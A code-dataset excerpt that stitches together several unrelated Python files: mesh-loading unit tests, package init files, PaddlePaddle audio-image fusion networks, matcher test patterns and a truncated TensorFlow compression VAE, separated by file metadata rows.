self.assertEqual(abTriangularMesh.landBoundaryExteriorType, feMeshSpec.landBoundaryType[1])
self.assertEqual(abTriangularMesh.landBoundaryIslandType, feMeshSpec.landBoundaryType[5])
bndnds = feMeshSpec.landBoundaries[3]
self.assertEqual(8, len(bndnds))
self.assertEqual(453, bndnds[-1])
finally:
os.remove(tmpfnm)
def testCreateSchismWWMBndFile(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridWestMed.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
schismWWMBndFilePath = os.path.join(mdldir, 'triangularMeshTest/schismWWMbnd.gr3')
feMeshSpec.createSchismWWMBndFile(schismWWMBndFilePath)
try:
self.assertTrue(os.path.isfile(schismWWMBndFilePath))
dt = np.loadtxt(schismWWMBndFilePath, skiprows=2)
# some random check
self.assertEqual(1587, dt.shape[0])
self.assertEqual(4, dt.shape[1])
self.assertEqual(100, dt[99, 0])
self.assertEqual(0, dt[99, 1])
self.assertEqual(2, dt[1, 0])
self.assertEqual(1, dt[2, 1])
self.assertEqual(992, dt[991, 0])
self.assertEqual(-1, dt[991, 1])
finally:
os.remove(schismWWMBndFilePath)
def testGetCellPolygons_all(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridGiamaica.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
nodeIds, cellPly = feMeshSpec.getCellPolygons(excludeLandBoundary=False,
excludeOpenBoundary=False)
self.assertEqual(410, len(nodeIds))
self.assertEqual(410, len(cellPly))
for nid, cp in zip(nodeIds, cellPly):
ndpt = g.Point(feMeshSpec.nodes[nid])
self.assertTrue(cp.contains(ndpt) or cp.boundary.contains(ndpt))
if plotPolygons:
import plot.abPolyPlot as pp
pp.plotFeMesh(feMeshSpec.nodes, feMeshSpec.connectionPolygons)
pp.plotPolyList(cellPly, doshow=True, title='all')
def testGetCellPolygons_excludeLandBoundary(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridGiamaica.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
nodeIds, cellPly = feMeshSpec.getCellPolygons(excludeLandBoundary=True,
excludeOpenBoundary=False)
self.assertEqual(362, len(nodeIds))
self.assertEqual(362, len(cellPly))
for nid, cp in zip(nodeIds, cellPly):
ndpt = g.Point(feMeshSpec.nodes[nid])
self.assertTrue(cp.contains(ndpt) or cp.boundary.contains(ndpt))
if plotPolygons:
import plot.abPolyPlot as pp
pp.plotFeMesh(feMeshSpec.nodes, feMeshSpec.connectionPolygons)
pp.plotPolyList(cellPly, doshow=True, title='exclude land boundary')
def testGetCellPolygons_excludeAllBoundary(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridGiamaica.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
nodeIds, cellPly = feMeshSpec.getCellPolygons(excludeLandBoundary=True,
excludeOpenBoundary=True)
self.assertEqual(298, len(nodeIds))
self.assertEqual(298, len(cellPly))
for nid, cp in zip(nodeIds, cellPly):
ndpt = g.Point(feMeshSpec.nodes[nid])
self.assertTrue(cp.contains(ndpt) or cp.boundary.contains(ndpt))
if plotPolygons:
import plot.abPolyPlot as pp
pp.plotFeMesh(feMeshSpec.nodes, feMeshSpec.connectionPolygons)
pp.plotPolyList(cellPly, doshow=True, title='exclude all boundary')
def testGetCellPolygons_file2(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridSmallIsland.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
nodeIds, cellPly = feMeshSpec.getCellPolygons()
self.assertEqual(252, len(nodeIds))
self.assertEqual(252, len(cellPly))
for nid, cp in zip(nodeIds, cellPly):
ndpt = g.Point(feMeshSpec.nodes[nid])
self.assertTrue(cp.contains(ndpt) or cp.boundary.contains(ndpt))
if plotPolygons:
import plot.abPolyPlot as pp
pp.plotFeMesh(feMeshSpec.nodes, feMeshSpec.connectionPolygons)
pp.plotPolyList(cellPly, doshow=True, title='exclude land boundary')
def testLoadFromMshFile1(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/med.msh')
feMeshSpec = abTriangularMesh.loadFromMshFile(mshFilePath)
# some random checks
self.assertEqual(24996, len(feMeshSpec.connectionPolygons.keys()))
self.assertEqual([4293, 4292, 11180], feMeshSpec.connectionPolygons[7])
self.assertEqual(16514, len(feMeshSpec.nodes.keys()))
self.assertAlmostEqual((4.98622, 43.39583), feMeshSpec.nodes[350])
self.assertEqual(16514, len(feMeshSpec.nodeBathy.keys()))
self.assertAlmostEqual(0, feMeshSpec.nodeBathy[150])
self.assertAlmostEqual(-1793.89160670, feMeshSpec.nodeBathy[11234])
self.assertEqual(0, len(feMeshSpec.openBoundaryNodes.keys()))
self.assertEqual(5993, len(feMeshSpec.landBoundaryNodes.keys()))
self.assertEqual(5993, len(feMeshSpec.landBoundaryOrdered))
self.assertTrue(1 in feMeshSpec.landBoundaryNodes)
self.assertTrue(100 in feMeshSpec.landBoundaryNodes)
self.assertFalse(6000 in feMeshSpec.landBoundaryNodes)
self.assertTrue(1 in feMeshSpec.landBoundaryOrdered)
self.assertTrue(100 in feMeshSpec.landBoundaryOrdered)
self.assertFalse(6000 in feMeshSpec.landBoundaryOrdered)
def testSaveMshFile1(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/med.msh')
feMeshSpec = abTriangularMesh.loadFromMshFile(mshFilePath)
mshTestFilePath = os.path.join(mdldir, 'triangularMeshTest/test_med_copy.msh')
feMeshSpec.saveAsMsh(mshTestFilePath)
try:
self.assertTrue(os.path.isfile(mshTestFilePath))
feMeshSpec = abTriangularMesh.loadFromMshFile(mshTestFilePath)
self.assertEqual(24996, len(feMeshSpec.connectionPolygons.keys()))
self.assertEqual([4293, 4292, 11180], feMeshSpec.connectionPolygons[7])
self.assertEqual(16514, len(feMeshSpec.nodes.keys()))
self.assertAlmostEqual((4.98622, 43.39583), feMeshSpec.nodes[350])
self.assertEqual(16514, len(feMeshSpec.nodeBathy.keys()))
self.assertAlmostEqual(0, feMeshSpec.nodeBathy[150])
self.assertAlmostEqual(1793.8916, feMeshSpec.nodeBathy[11234], 4)
self.assertEqual(0, len(feMeshSpec.openBoundaryNodes.keys()))
self.assertEqual(5993, len(feMeshSpec.landBoundaryNodes.keys()))
self.assertTrue(1 in feMeshSpec.landBoundaryNodes)
self.assertTrue(100 in feMeshSpec.landBoundaryNodes)
self.assertFalse(6000 in feMeshSpec.landBoundaryNodes)
finally:
os.remove(mshTestFilePath)
def testSaveMshFile2(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridSmallIsland.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
mshTestFilePath = os.path.join(mdldir, 'triangularMeshTest/test_smallIsland_copy.msh')
feMeshSpec.saveAsMsh(mshTestFilePath, bathyFactor=-1)
try:
self.assertTrue(os.path.isfile(mshTestFilePath))
feMeshSpec = abTriangularMesh.loadFromMshFile(mshTestFilePath)
# some random checks
self.assertEqual(507, len(feMeshSpec.connectionPolygons.keys()))
self.assertEqual([262, 280, 263], feMeshSpec.connectionPolygons[200])
self.assertEqual(287, len(feMeshSpec.nodes.keys()))
self.assertAlmostEqual((155.9556547, -57.57893481), feMeshSpec.nodes[150])
self.assertEqual(287, len(feMeshSpec.nodeBathy.keys()))
self.assertAlmostEqual(3368, feMeshSpec.nodeBathy[150])
self.assertEqual(0, len(feMeshSpec.openBoundaryNodes.keys()))
self.assertEqual(35, len(feMeshSpec.landBoundaryNodes.keys()))
self.assertFalse(100 in feMeshSpec.landBoundaryNodes)
self.assertTrue(27 in feMeshSpec.landBoundaryNodes)
self.assertTrue(1 in feMeshSpec.landBoundaryNodes)
self.assertTrue(2 in feMeshSpec.landBoundaryNodes)
finally:
os.remove(mshTestFilePath)
def testSaveMshFileBathyFactor(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridSmallIsland.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
mshTestFilePath = os.path.join(mdldir, 'triangularMeshTest/test_smallIsland_copy.msh')
feMeshSpec.saveAsMsh(mshTestFilePath, bathyFactor=1)
try:
self.assertTrue(os.path.isfile(mshTestFilePath))
feMeshSpec = abTriangularMesh.loadFromMshFile(mshTestFilePath)
self.assertAlmostEqual(-3368, feMeshSpec.nodeBathy[150])
finally:
os.remove(mshTestFilePath)
def testAdjustCrossDatelineVertices(self):
x = [0, 1, .5]
y = [10, 10, 11]
vertices = [vrtx for vrtx in zip(x, y)]
vertices = abTriangularMesh.adjustCrossDatelineVertices(vertices)
for xexp, yexp, xyfnd in zip(x, y, vertices):
self.assertEqual(xexp, xyfnd[0])
self.assertEqual(yexp, xyfnd[1])
x = [-179, 179, 180]
y = [10, 10, 11]
xexps = [181, 179, 180]
vertices = [vrtx for vrtx in zip(x, y)]
vertices = abTriangularMesh.adjustCrossDatelineVertices(vertices)
for xexp, yexp, xyfnd in zip(xexps, y, vertices):
self.assertEqual(xexp, xyfnd[0])
self.assertEqual(yexp, xyfnd[1])
x = [179, -179, 180]
y = [10, 10, 11]
xexps = [179, 181, 180]
vertices = [vrtx for vrtx in zip(x, y)]
vertices = abTriangularMesh.adjustCrossDatelineVertices(vertices)
for xexp, yexp, xyfnd in zip(xexps, y, vertices):
self.assertEqual(xexp, xyfnd[0])
self.assertEqual(yexp, xyfnd[1])
x = [179, 180, -179]
y = [10, 11, 10]
xexps = [179, 180, 181]
vertices = [vrtx for vrtx in zip(x, y)]
vertices = abTriangularMesh.adjustCrossDatelineVertices(vertices)
for xexp, yexp, xyfnd in zip(xexps, y, vertices):
self.assertEqual(xexp, xyfnd[0])
self.assertEqual(yexp, xyfnd[1])
x = [179, -179, -180]
y = [10, 10, 11]
xexps = [-181, -179, -180]
vertices = [vrtx for vrtx in zip(x, y)]
vertices = abTriangularMesh.adjustCrossDatelineVertices(vertices)
for xexp, yexp, xyfnd in zip(xexps, y, vertices):
self.assertEqual(xexp, xyfnd[0])
self.assertEqual(yexp, xyfnd[1])
x = [-179, 179, -180]
y = [10, 10, 11]
xexps = [-179, -181, -180]
vertices = [vrtx for vrtx in zip(x, y)]
vertices = abTriangularMesh.adjustCrossDatelineVertices(vertices)
for xexp, yexp, xyfnd in zip(xexps, y, vertices):
self.assertEqual(xexp, xyfnd[0])
self.assertEqual(yexp, xyfnd[1])
x = [-179, -180, 179]
y = [10, 11, 10]
xexps = [-179, -180, -181]
vertices = [vrtx for vrtx in zip(x, y)]
vertices = abTriangularMesh.adjustCrossDatelineVertices(vertices)
for xexp, yexp, xyfnd in zip(xexps, y, vertices):
self.assertEqual(xexp, xyfnd[0])
self.assertEqual(yexp, xyfnd[1])
def testGetNodesDataFrame(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridGiamaica.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
df = feMeshSpec.getNodesDataframe()
# some random checks
self.assertEqual(410, len(df))
self.assertEqual(3, len(df.columns))
self.assertAlmostEqual(df[df.index==350].x.values[0], -77.3890650728)
self.assertAlmostEqual(df[df.index==350].y.values[0], 17.6616614616)
self.assertAlmostEqual(410, len(feMeshSpec.nodeBathy.keys()))
self.assertAlmostEqual(119.0, df[df.index==350].bathy.values[0])
if __name__ == '__main__':
unittest.main()
| 45.015748 | 97 | 0.719958 | 1,856 | 17,151 | 6.612069 | 0.117457 | 0.119785 | 0.034061 | 0.023468 | 0.830671 | 0.786832 | 0.76043 | 0.752282 | 0.733621 | 0.730443 | 0 | 0.054427 | 0.159058 | 17,151 | 380 | 98 | 45.134211 | 0.796436 | 0.008746 | 0 | 0.65625 | 0 | 0 | 0.043256 | 0.038371 | 0 | 0 | 0 | 0 | 0.446875 | 1 | 0.046875 | false | 0 | 0.028125 | 0 | 0.078125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7644f80502cdf17c108096453efe2bc8d751122f | 84 | py | Python | lib_stylegan/__init__.py | leoHeidel/3d-style | d7dd95c76ffd25d03165ed02692cd3300568b8f3 | [
"MIT"
] | 4 | 2020-12-09T16:38:18.000Z | 2022-03-27T07:10:24.000Z | lib_stylegan/__init__.py | leoHeidel/stylegan2-keras | d7dd95c76ffd25d03165ed02692cd3300568b8f3 | [
"MIT"
] | null | null | null | lib_stylegan/__init__.py | leoHeidel/stylegan2-keras | d7dd95c76ffd25d03165ed02692cd3300568b8f3 | [
"MIT"
] | null | null | null | import lib_stylegan.lib_3d
import lib_stylegan.style_gan
import lib_stylegan.dataset | 28 | 29 | 0.904762 | 14 | 84 | 5.071429 | 0.5 | 0.380282 | 0.71831 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012658 | 0.059524 | 84 | 3 | 30 | 28 | 0.886076 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
765b5ab09900db427941d05be0e75daffe691490 | 5,399 | py | Python | model/fusion_net.py | holyseven/Cross-Task-Transfer-for-Geotagged-Audiovisual-Aerial-Scene-Recognition | 9001037caecc35c7bef10009971342b22ccc4221 | [
"MIT"
] | 1 | 2022-02-22T19:08:18.000Z | 2022-02-22T19:08:18.000Z | model/fusion_net.py | holyseven/Cross-Task-Transfer-for-Geotagged-Audiovisual-Aerial-Scene-Recognition | 9001037caecc35c7bef10009971342b22ccc4221 | [
"MIT"
] | null | null | null | model/fusion_net.py | holyseven/Cross-Task-Transfer-for-Geotagged-Audiovisual-Aerial-Scene-Recognition | 9001037caecc35c7bef10009971342b22ccc4221 | [
"MIT"
] | null | null | null | import paddle
import paddle.nn as nn
import numpy as np
class FusionNet(nn.Layer):
def __init__(self, image_net, audio_net,num_classes):
super(FusionNet, self).__init__()
self.image_net = image_net
self.audio_net = audio_net
self.num_classes = num_classes
#self.image_fc1 = nn.Linear(2048,1024)
#self.audio_fc1 = nn.Linear(2048,1024)
#self.fusion_fc1 = nn.Linear(2048,512)
#self.fusion_fc2 = nn.Linear(512,self.num_classes)
self.fusion_fc = nn.Linear(4096, self.num_classes)
self.relu = nn.ReLU(inplace=True)
def forward(self, image, audio):
image_rep = self.image_net(image)[0] # fc_rep
audio_rep = self.audio_net(audio)[0] # fc_rep
#audio_rep = paddle.zeros_like(image_rep)
#image_rep = self.image_fc1(image_rep)
#image_rep = self.relu(image_rep) # batch_size * 1024
#audio_rep = self.audio_fc1(audio_rep)
#audio_rep = self.relu(audio_rep) # batch_Size * 1024
concat_rep = paddle.concat((image_rep,audio_rep), axis = 1)
concat_rep = self.fusion_fc(concat_rep)
return concat_rep
class FusionNet_Bayes(nn.Layer):
def __init__(self, image_net, audio_net, num_classes):
super(FusionNet_Bayes, self).__init__()
#self.scene_to_event = np.load('scene_to_event_prior_59.npy')
#self.scene_to_event = paddle.to_tensor(self.scene_to_event).cuda()
self.image_net = image_net
self.audio_net = audio_net
self.num_classes = num_classes
#self.image_fc1 = nn.Linear(2048,1024)
#self.audio_fc1 = nn.Linear(2048,1024)
#self.fusion_fc1 = nn.Linear(2048,512)
#self.fusion_fc2 = nn.Linear(512,self.num_classes)
self.fusion_fc = nn.Linear(4096, self.num_classes)
self.relu = nn.ReLU(inplace=True)
self.softmax = nn.Softmax(axis=1)
def forward(self, image, audio):
image_rep = self.image_net(image)[0] # fc_rep
audio_rep = self.audio_net(audio)[0] # fc_rep
concat_rep = paddle.concat((image_rep,audio_rep), axis = 1)
concat_rep = self.fusion_fc(concat_rep)
'''
scene_predict = self.softmax(concat_rep)
scene_to_event_ = paddle.squeeze(scene_to_event[0,:,:])
#print(scene_to_event_.shape)
event_predict = scene_predict.matmul(scene_to_event_)
'''
return concat_rep
class FusionNet_SQ(nn.Layer):
def __init__(self, image_net, audio_net,num_classes):
super(FusionNet_SQ, self).__init__()
self.image_net = image_net
self.audio_net = audio_net
self.num_classes = num_classes
#self.image_fc1 = nn.Linear(2048,1024)
#self.audio_fc1 = nn.Linear(2048,1024)
#self.fusion_fc1 = nn.Linear(2048,512)
#self.fusion_fc2 = nn.Linear(512,self.num_classes)
self.fusion_fc = nn.Linear(4096, self.num_classes)
self.KD_fc = nn.Linear(2048, 527)
self.sig = nn.Sigmoid()
def forward(self, image,audio):
image_rep = self.image_net(image)[0] # fc_rep
audio_rep = self.audio_net(audio)[0] # fc_rep
#audio_rep = paddle.zeros_like(image_rep)
concat_rep = paddle.concat((image_rep,audio_rep), axis = 1)
concat_rep = self.fusion_fc(concat_rep)
sed_output = self.KD_fc(audio_rep)
#sed_output = self.sig(sed_output)
return concat_rep, sed_output
class FusionNet_KL(nn.Layer):
def __init__(self, image_net, audio_net,num_classes):
super(FusionNet_KL, self).__init__()
self.image_net = image_net
self.audio_net = audio_net
self.num_classes = num_classes
#self.image_fc1 = nn.Linear(2048,1024)
#self.audio_fc1 = nn.Linear(2048,1024)
#self.fusion_fc1 = nn.Linear(2048,512)
#self.fusion_fc2 = nn.Linear(512,self.num_classes)
self.fusion_fc = nn.Linear(4096, self.num_classes)
self.KD_fc = nn.Linear(4096, 527)
self.sig = nn.Sigmoid()
def forward(self, image,audio):
image_rep = self.image_net(image)[0] # fc_rep
audio_rep = self.audio_net(audio)[0] # fc_rep
#image_rep = paddle.zeros_like(audio_rep)
concat_rep = paddle.concat((image_rep,audio_rep), axis = 1)
concat_rep_ = self.fusion_fc(concat_rep)
sed_output = self.KD_fc(concat_rep)
sed_output = self.sig(sed_output)
return concat_rep_, sed_output
class FusionNet_uni(nn.Layer):
def __init__(self, image_net, audio_net,num_classes):
super(FusionNet_uni, self).__init__()
self.image_net = image_net
self.audio_net = audio_net
self.num_classes = num_classes
#self.image_fc1 = nn.Linear(2048,1024)
#self.audio_fc1 = nn.Linear(2048,1024)
#self.fusion_fc1 = nn.Linear(2048,512)
#self.fusion_fc2 = nn.Linear(512,self.num_classes)
self.fusion_fc = nn.Linear(2048, self.num_classes)
self.KD_fc = nn.Linear(2048, 527)
self.sig = nn.Sigmoid()
def forward(self, image):
image_rep = self.image_net(image)[0] # fc_rep
#audio_rep = self.audio_net(audio)[0] # fc_rep
concat_rep_ = self.fusion_fc(image_rep)
sed_output = self.KD_fc(image_rep)
sed_output = self.sig(sed_output)
return concat_rep_, sed_output
| 31.758824 | 75 | 0.646231 | 779 | 5,399 | 4.14249 | 0.084724 | 0.069414 | 0.066935 | 0.069724 | 0.850325 | 0.819337 | 0.807561 | 0.807561 | 0.807561 | 0.807561 | 0 | 0.053467 | 0.241341 | 5,399 | 169 | 76 | 31.946746 | 0.734375 | 0.252454 | 0 | 0.7125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.0375 | 0 | 0.2875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
768f672cd0bb1b51eb30682144517415c8e99bda | 3,146 | py | Python | tests/matcher/data.py | datapio/klander | d862bb1640a6cf4c0010246e1d53316103321a4d | [
"Apache-2.0"
] | 2 | 2021-05-14T22:00:55.000Z | 2021-09-17T20:09:17.000Z | tests/matcher/data.py | datapio/klander | d862bb1640a6cf4c0010246e1d53316103321a4d | [
"Apache-2.0"
] | null | null | null | tests/matcher/data.py | datapio/klander | d862bb1640a6cf4c0010246e1d53316103321a4d | [
"Apache-2.0"
] | 1 | 2021-07-16T08:35:43.000Z | 2021-07-16T08:35:43.000Z | patterns = [
(
dict(foo='bar'),
dict(field='foo', where=['$eq', 'bar']),
True
),
(
dict(foo='bar'),
dict(field='foo', where=['$eq', 'baz']),
False
),
(
dict(foo='bar'),
dict(field='foo', where=['$ne', 'bar']),
False
),
(
dict(foo='bar'),
dict(field='foo', where=['$ne', 'baz']),
True
),
(
dict(foo=42),
dict(field='foo', where=['$gt', 41]),
True
),
(
dict(foo=42),
dict(field='foo', where=['$gt', 42]),
False
),
(
dict(foo=42),
dict(field='foo', where=['$gt', 43]),
False
),
(
dict(foo=42),
dict(field='foo', where=['$gte', 41]),
True
),
(
dict(foo=42),
dict(field='foo', where=['$gte', 42]),
True
),
(
dict(foo=42),
dict(field='foo', where=['$gte', 43]),
False
),
(
dict(foo=42),
dict(field='foo', where=['$lt', 43]),
True
),
(
dict(foo=42),
dict(field='foo', where=['$lt', 42]),
False
),
(
dict(foo=42),
dict(field='foo', where=['$lt', 41]),
False
),
(
dict(foo=42),
dict(field='foo', where=['$lte', 43]),
True
),
(
dict(foo=42),
dict(field='foo', where=['$lte', 42]),
True
),
(
dict(foo=42),
dict(field='foo', where=['$lte', 41]),
False
),
(
dict(foo='bar'),
dict(field='foo', where=['$in', ['bar', 'baz']]),
True
),
(
dict(foo='bar'),
dict(field='foo', where=['$in', ['baz', 'biz']]),
False
),
(
dict(foo='bar'),
dict(field='foo', where=['$nin', ['bar', 'baz']]),
False
),
(
dict(foo='bar'),
dict(field='foo', where=['$nin', ['baz', 'biz']]),
True
),
(
dict(foo=dict(bar='baz')),
dict(field='foo.bar', where=['$eq', 'baz']),
True
),
(
dict(foo=[dict(bar='baz'), dict(bar='biz')]),
dict(field='foo[*].bar', where=['$in', ['baz', 'biz']]),
True
),
(
dict(foo=[dict(bar='baz'), dict(bar='biz')]),
dict(field='foo[*].bar', where=['$eq', 'baz']),
False
),
(
dict(foo=23, bar=42),
dict(oneOf=[
dict(field='foo', where=['$eq', 42]),
dict(field='bar', where=['$eq', 42])
]),
True
),
(
dict(foo=23, bar=23),
dict(oneOf=[
dict(field='foo', where=['$eq', 42]),
dict(field='bar', where=['$eq', 42])
]),
False
),
(
dict(foo=42, bar=42),
dict(allOf=[
dict(field='foo', where=['$eq', 42]),
dict(field='bar', where=['$eq', 42])
]),
True
),
(
dict(foo=42, bar=23),
dict(allOf=[
dict(field='foo', where=['$eq', 42]),
dict(field='bar', where=['$eq', 42])
]),
False
)
]
| 20.973333 | 64 | 0.373172 | 331 | 3,146 | 3.546828 | 0.072508 | 0.237649 | 0.27598 | 0.34753 | 0.947189 | 0.937819 | 0.927598 | 0.905451 | 0.760647 | 0.287905 | 0 | 0.041451 | 0.386523 | 3,146 | 149 | 65 | 21.114094 | 0.566839 | 0 | 0 | 0.610738 | 0 | 0 | 0.095041 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
76a0ec698289c1dacfa0678d60750d51ad79b814 | 218 | py | Python | dhnx/optimization/__init__.py | oemof-heat/DHNx | edb5c9be17f74d7f200c1eb6a17000a26633bdc3 | [
"MIT"
] | null | null | null | dhnx/optimization/__init__.py | oemof-heat/DHNx | edb5c9be17f74d7f200c1eb6a17000a26633bdc3 | [
"MIT"
] | 10 | 2019-11-01T18:03:13.000Z | 2020-02-19T14:07:35.000Z | dhnx/optimization/__init__.py | oemof-heat/district_heating_simulation | edb5c9be17f74d7f200c1eb6a17000a26633bdc3 | [
"MIT"
] | null | null | null | from . import add_components # noqa: F401
from . import dhs_nodes # noqa: F401
from . import oemof_heatpipe # noqa: F401
from . import optimization_models # noqa: F401
from . import precalc_hydraulic # noqa: F401
| 36.333333 | 47 | 0.747706 | 30 | 218 | 5.266667 | 0.466667 | 0.316456 | 0.303797 | 0.455696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08427 | 0.183486 | 218 | 5 | 48 | 43.6 | 0.803371 | 0.247706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4f8d4d0dc84bb7d9d58b9a9150072e7f344fe7c4 | 186 | py | Python | code/world/__init__.py | FrederikWR/course-02443-stochastic-virus-outbreak | 4f1d7f1fa4aa197b31ed86c4daf420d5a637974e | [
"MIT"
] | null | null | null | code/world/__init__.py | FrederikWR/course-02443-stochastic-virus-outbreak | 4f1d7f1fa4aa197b31ed86c4daf420d5a637974e | [
"MIT"
] | null | null | null | code/world/__init__.py | FrederikWR/course-02443-stochastic-virus-outbreak | 4f1d7f1fa4aa197b31ed86c4daf420d5a637974e | [
"MIT"
] | null | null | null |
from .regions import regions, Region
from .routes import routes, Route
from ._cross_reference import cross_reference as _cross_reference
import tools
_cross_reference(regions, routes)
| 23.25 | 65 | 0.83871 | 25 | 186 | 5.96 | 0.4 | 0.375839 | 0.268456 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.11828 | 186 | 7 | 66 | 26.571429 | 0.908537 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.8 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4f9a9b90d1aed19552fdb0d97ecbfc5f801e918e | 41,188 | py | Python | code/clic/architectures.py | gergely-flamich/miracle-compression | 7bee78f47982dda123343d25ead9de3c8bce17f5 | [
"MIT"
] | null | null | null | code/clic/architectures.py | gergely-flamich/miracle-compression | 7bee78f47982dda123343d25ead9de3c8bce17f5 | [
"MIT"
] | 14 | 2020-01-28T22:13:39.000Z | 2022-02-10T00:22:22.000Z | code/clic/architectures.py | gergely-flamich/miracle-compression | 7bee78f47982dda123343d25ead9de3c8bce17f5 | [
"MIT"
] | null | null | null | import tensorflow as tf
from sonnet import AbstractModule, Linear, BatchFlatten, BatchReshape, reuse_variables, \
Conv2D, BatchNorm
import tensorflow_probability as tfp
tfd = tfp.distributions
from miracle_modules import ConvDS
from utils import InvalidArgumentError
# ==============================================================================
# ==============================================================================
#
# Superclasses
#
# ==============================================================================
# ==============================================================================
class ClicVAE(AbstractModule):
_allowed_priors = ["gaussian", "laplace"]
_allowed_likelihoods = ["gaussian", "laplace"]
_allowed_paddings = ["SAME", "VALID", "SAME_MIRRORED"]
def __init__(self,
prior="gaussian",
likelihood="gaussian",
padding="SAME",
name="clic_vae"):
# Initialise the superclass
super(ClicVAE, self).__init__(name=name)
if prior not in self._allowed_priors:
raise tf.errors.InvalidArgumentError("prior must be one of {}"
.format(self._allowed_priors))
if likelihood not in self._allowed_likelihoods:
raise tf.errors.InvalidArgumentError("likelihood must be one of {}"
.format(self._allowed_likelihoods))
if padding not in self._allowed_paddings:
raise tf.errors.InvalidArgumentError("padding must be one of {}"
.format(self._allowed_paddings))
self._prior_dist = prior
self._likelihood = likelihood
self._padding = padding
def required_input_size(self, shape, for_padding="VALID"):
raise NotImplementedError
@reuse_variables
def encode(self, inputs):
raise NotImplementedError
@reuse_variables
def decode(self, latents):
raise NotImplementedError
@property
def log_prob(self):
self._ensure_is_connected()
return tf.reduce_sum(self._log_prob)
@property
def kl_divergence(self):
"""
Calculates the KL divergence between the current variational posterior and the prior:
KL[ q(z | theta) || p(z) ]
"""
self._ensure_is_connected()
return tf.reduce_sum(
tfd.kl_divergence(self._q, self._latent_prior))
def _build(self, inputs):
"""
Build standard VAE:
1. Encode input -> latent mu, sigma
2. Sample z ~ N(z | mu, sigma)
3. Decode z -> output Bernoulli means
4. Sample o ~ Normal(o | z)
"""
# Get the means and variances of variational posteriors
q_mu, q_sigma = self.encode(inputs)
if self._prior_dist == "gaussian":
q = tfd.Normal(loc=q_mu, scale=q_sigma)
elif self._prior_dist == "laplace":
q = tfd.Laplace(loc=q_mu, scale=q_sigma)
latents = q.sample()
if self._prior_dist == "gaussian":
